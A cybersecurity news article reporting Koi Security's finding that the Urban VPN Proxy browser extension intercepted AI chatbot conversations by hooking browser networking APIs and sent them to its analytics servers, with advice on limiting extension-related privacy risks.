Urban VPN Browser Extension Caught Logging AI Chatbot Conversations

CyberSecureFox 🦊

Researchers from Koi Security have reported that the popular VPN browser extension Urban VPN Proxy, installed by millions of users, was silently intercepting and exfiltrating conversations with AI chatbots, including ChatGPT, Claude, Gemini, Copilot and others, and sending this data to external analytics servers.

Urban VPN’s “Recommended” Browser Extension Under Scrutiny

Urban VPN markets itself as “the most secure free VPN for accessing any website” and enjoys a rating of around 4.7 in the Chrome Web Store, with more than 6 million installs. In the Microsoft Edge Add-ons store, it has over 1.3 million installations. Several additional extensions from the same developer collectively add more than 8 million users to the ecosystem.

A key trust factor is that many of these extensions carry the “Recommended” badge in both the Chrome Web Store and Edge Add-ons. Users often interpret this badge as a signal of enhanced security and compliance with best practices, which strongly influences installation decisions.

How the Urban VPN Extension Collected AI Chatbot Data

According to Koi Security, version 5.5.0 of Urban VPN Proxy, released on 9 July 2025, introduced new functionality that enabled data collection from AI platforms by default. The extension added dedicated JavaScript modules for various services, such as chatgpt.js, claude.js, gemini.js, and others targeting different chatbots.

When users opened the corresponding AI services in the browser, these scripts were injected into the page and hooked core browser networking APIs, specifically fetch() and XMLHttpRequest. By wrapping or overriding these APIs, the extension could inspect every outbound request and inbound response before they reached the AI provider or were rendered in the user’s session.

As a result, the extension collected a broad set of sensitive data, including user prompts, chatbot responses, session identifiers, timestamps, platform information, and the specific AI model in use. This data was then transmitted to remote endpoints at analytics.urban-vpn[.]com and stats.urban-vpn[.]com, enabling large-scale logging of AI-related activity.

Privacy Policy Changes and the Role of BIScience

An updated Urban VPN privacy policy dated 25 June 2025 explicitly referenced the collection of data from AI chats. The stated purposes included improving the product’s Safe Browsing features and conducting marketing analytics. The document emphasised that data would be processed only in an “anonymised and aggregated” form.

Koi Security, however, highlighted a critical detail: one of the partners receiving this data is BIScience, the company that owns Urban Cyber Security, the brand behind Urban VPN. BIScience specialises in advertising analytics and brand monitoring, and according to the researchers, it receives “raw”, non-anonymised datasets that can then be used for commercial insights and potentially shared with other business partners.

Earlier, in January 2025, an independent security researcher had already accused BIScience of using SDKs embedded in partner extensions to collect users’ browsing histories, relying on vague wording in privacy documents. At that time, it was noted that BIScience and affiliates relied on exceptions to Chrome Web Store’s Limited Use policy, justifying access to sensitive data under the pretext of “delivering core functionality”.

AI Protection or Large-Scale Monitoring?

Urban VPN promoted an AI-specific security feature branded as “AI protection”. It promised to scan prompts for personal data and examine AI responses for suspicious links, warning users if there were potential risks. Conceptually, such safeguards could help users avoid accidentally leaking sensitive information to AI platforms.

Koi Security’s analysis, however, showed that the underlying data collection logic operated regardless of whether the AI protection option was enabled. The warning pop-ups served primarily as user-facing messaging about risk, while the actual prompts, responses and related metadata were simultaneously forwarded to Urban VPN’s servers and, by extension, to its analytics partner.

Systemic Risks of Browser Extensions in Chrome and Edge

Koi Security identified similar AI-related data collection mechanisms in three additional extensions from the same developer for Chrome and Edge, collectively installed more than 8 million times. Nearly all of these extensions carried the Recommended badge in the official stores, except for one Ad Blocker product.

This case illustrates a structural issue in the browser ecosystem: recommendation badges and baseline store review are not sufficient guarantees of privacy. Extensions with powerful permissions—such as the ability to read and modify data on all websites or intercept network traffic—can implement sophisticated monitoring logic that is difficult for non-experts to detect, especially when it is buried in obfuscated or dynamically loaded code.

Why AI Chatbot Data Is Especially Sensitive

Conversations with AI systems often include highly confidential content: draft contracts, source code, internal policies, incident reports, financial models or personal data about employees and customers. When both the AI provider and third-party extensions log this content, it greatly increases the attack surface for data breaches, profiling and regulatory non-compliance (for example, in relation to GDPR or other privacy laws).

Practical Steps to Reduce Extension-Related Risks

For individuals and organisations, this incident underscores the need for strict browser extension hygiene:

  • Minimise the number of extensions and remove anything not strictly necessary.
  • Review requested permissions and avoid extensions that demand access to “all sites” or full browsing data unless absolutely required.
  • Separate work and personal browsing into different profiles or browsers to limit cross-exposure of sensitive data.
  • Regularly audit installed extensions, especially after updates to permissions or privacy policies.
  • Avoid pasting confidential information into AI prompts unless there is a clear, contractual data protection framework in place.

The Urban VPN episode demonstrates that even popular, highly rated and officially “recommended” extensions can become tools for mass collection of sensitive information. When interacting with AI chatbots, it is prudent to assume that any text entered into a prompt may be logged and analysed by multiple third parties—at the AI provider level and within the browser itself. Strengthening extension governance, reducing unnecessary permissions and treating AI chats as inherently non-private channels are essential steps for improving cybersecurity and safeguarding both personal and corporate data.

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.